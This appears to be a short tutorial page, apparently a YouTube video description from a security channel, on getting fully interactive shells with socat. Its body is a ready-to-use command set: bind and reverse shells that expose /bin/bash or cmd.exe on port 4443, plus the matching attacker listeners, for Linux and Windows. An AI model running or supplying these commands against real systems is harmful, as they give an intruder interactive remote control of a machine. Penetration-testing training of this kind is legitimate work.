How To Get A FULLY Interactive Reverse Shell in Linux OR Windows



How To Get A FULLY Interactive Reverse Shell in Linux OR Windows

How To Get A FULLY Interactive Reverse Shell in Linux OR Windows

Netcat is an amazing tool and is so useful and versatile for penetration tests and even other IT administration tasks. However, it is very limited, especially with Penetration Testing.
A Reverse Shell with Socat will give you a much higher degree of interactivity, even allowing you functionality to edit files in the command line, just like a SSH session.

Commands:
Bind Shell
Victim Linux: socat -d -d TCP4-LISTEN:4443 EXEC:/bin/bash
Victim Windows: socat -d -d TCP4-LISTEN:4443 EXEC:’cmd.exe’,pipes
Attacker: socat – TCP4:192.168.1.1:4443

Reverse Shell
Victim Linux: socat TCP4:192.168.168.1:4443 EXEC:/bin/bash
Victim Windows: socat TCP4:192.168.1.1:4443 EXEC:’cmd.exe’,pipes
Attacker: socat -d -d TCP4-LISTEN:4443 STDOUT

Encrypted Bind / Reverse Shells
Read this article: https://erev0s.com/blog/encrypted-bind-and-reverse-shells-socat/

Links:
__________________________________________
Twitter: https://twitter.com/JSON_SEC
Buy me a coffee: https://PayPal.Me/jsonsec

===== About JSON : Sec =====
JSON Sec is a Cyber Security YouTube channel, bringing you a range of videos from technical tutorials, security tips and documentaries . The goal is to help everybody through all technical levels to improve the security of their digital life.
Please consider subscribing if you enjoyed this video!

Comments are closed.